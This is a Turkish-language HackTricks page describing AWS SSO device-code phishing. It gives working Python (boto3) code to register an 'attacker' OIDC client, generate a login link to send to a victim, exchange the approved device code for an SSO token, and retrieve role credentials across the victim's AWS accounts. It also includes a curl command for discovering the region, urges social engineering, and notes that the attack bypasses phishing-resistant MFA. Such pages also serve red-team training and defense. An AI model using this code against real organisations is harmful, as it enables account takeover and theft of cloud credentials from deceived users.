AWS - Identity Center & SSO Unauthenticated Enum

AWS Hacking'i öğrenin ve pratik yapın:HackTricks Eğitim AWS Kırmızı Ekip Uzmanı (ARTE) GCP Hacking'i öğrenin ve pratik yapın: HackTricks Eğitim GCP Kırmızı Ekip Uzmanı (GRTE)

HackTricks'i Destekleyin

abonelik planlarını kontrol edin!
💬 Discord grubuna veya telegram grubuna katılın ya da Twitter'da 🐦 @hacktricks_live'i takip edin.**
Hacking ipuçlarını paylaşmak için HackTricks ve HackTricks Cloud github reposuna PR gönderin.

AWS Cihaz Kodu Phishing

Başlangıçta bu blog yazısında önerilen, AWS SSO kullanarak bir kullanıcıya bağlantı göndermek mümkündür; eğer kullanıcı kabul ederse, saldırgan kullanıcıyı taklit etmek için bir token alabilir ve Kimlik Merkezi'nde kullanıcının erişebileceği tüm rollere erişebilir.

Bu saldırıyı gerçekleştirmek için gereksinimler şunlardır:

Kurbanın Kimlik Merkezi'ni kullanması gerekir
Saldırgan, kurbanın kullandığı alt alan adını bilmelidir <victimsub>.awsapps.com/start

Sadece önceki bilgilerle, saldırgan kullanıcıya bir bağlantı gönderebilir; eğer kabul edilirse, saldırgana AWS kullanıcı hesabına erişim verecektir.

Saldırı

Alt alan adını bulma

Saldırganın ilk adımı, kurban şirketinin Kimlik Merkezi'nde kullandığı alt alan adını bulmaktır. Bu, OSINT veya tahmin + BF ile yapılabilir, çünkü çoğu şirket burada adını veya adının bir varyasyonunu kullanacaktır.

Bu bilgiyle, Kimlik Merkezi'nin yapılandırıldığı bölgeyi almak mümkündür:

curl https://victim.awsapps.com/start/ -s | grep -Eo '"region":"[a-z0-9\-]+"'
"region":"us-east-1

Kurban için bağlantıyı oluşturun ve gönderin

Kurbanın kimlik doğrulaması yapabilmesi için bir AWS SSO giriş bağlantısı oluşturmak üzere aşağıdaki kodu çalıştırın. Demo için, bu kodu bir python konsolunda çalıştırın ve çıkmayın çünkü daha sonra token almak için bazı nesnelere ihtiyacınız olacak:

import boto3

REGION = 'us-east-1' # CHANGE THIS
AWS_SSO_START_URL = 'https://victim.awsapps.com/start' # CHANGE THIS

sso_oidc = boto3.client('sso-oidc', region_name=REGION)
client = sso_oidc.register_client(
clientName = 'attacker',
clientType = 'public'
)

client_id = client.get('clientId')
client_secret = client.get('clientSecret')
authz = sso_oidc.start_device_authorization(
clientId=client_id,
clientSecret=client_secret,
startUrl=AWS_SSO_START_URL
)

url = authz.get('verificationUriComplete')
deviceCode = authz.get('deviceCode')
print("Give this URL to the victim: " + url)

Gönderilen bağlantıyı kurbanın dikkatini çekmek için harika sosyal mühendislik becerilerinizi kullanarak iletin!

Kurbanın kabul etmesini bekleyin

Eğer kurban zaten AWS'de oturum açmışsa, sadece izinleri vermeyi kabul etmesi gerekecek; eğer açmamışsa, giriş yapması ve ardından izinleri vermeyi kabul etmesi gerekecek. İşte günümüzdeki istemin görünümü:

SSO erişim token'ını alın

Eğer kurban istemi kabul ettiyse, kullanıcıyı taklit ederek bir SSO token'ı oluşturmak için bu kodu çalıştırın:

token_response = sso_oidc.create_token(
clientId=client_id,
clientSecret=client_secret,
grantType="urn:ietf:params:oauth:grant-type:device_code",
deviceCode=deviceCode
)
sso_token = token_response.get('accessToken')

SSO erişim belirteci 8 saat geçerlidir.

Kullanıcıyı taklit et

sso_client = boto3.client('sso', region_name=REGION)

# List accounts where the user has access
aws_accounts_response = sso_client.list_accounts(
accessToken=sso_token,
maxResults=100
)
aws_accounts_response.get('accountList', [])

# Get roles inside an account
roles_response = sso_client.list_account_roles(
accessToken=sso_token,
accountId=<account_id>
)
roles_response.get('roleList', [])

# Get credentials over a role

sts_creds = sso_client.get_role_credentials(
accessToken=sso_token,
roleName=<role_name>,
accountId=<account_id>
)
sts_creds.get('roleCredentials')

Phishing the unphisable MFA

Önceki saldırının "unphisable MFA" (webAuth) kullanılsa bile çalıştığını bilmek eğlenceli. Bunun nedeni, önceki iş akışının kullanılan OAuth alanını asla terk etmemesidir. Kullanıcının giriş alanını değiştirmesi gereken diğer phishing saldırılarının aksine, cihaz kodu iş akışı, bir kodun bir cihaz tarafından bilindiği şekilde hazırlanmıştır ve kullanıcı farklı bir makinede bile giriş yapabilir. İstemi kabul ederse, cihaz, sadece ilk kodu bilerek, kullanıcının kimlik bilgilerini alabilecektir.

Daha fazla bilgi için bu gönderiye göz atın.

Automatic Tools

References

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

PreviousAWS - IAM & STS Unauthenticated Enum NextAWS - IoT Unauthenticated Enum

Last updated 3 days ago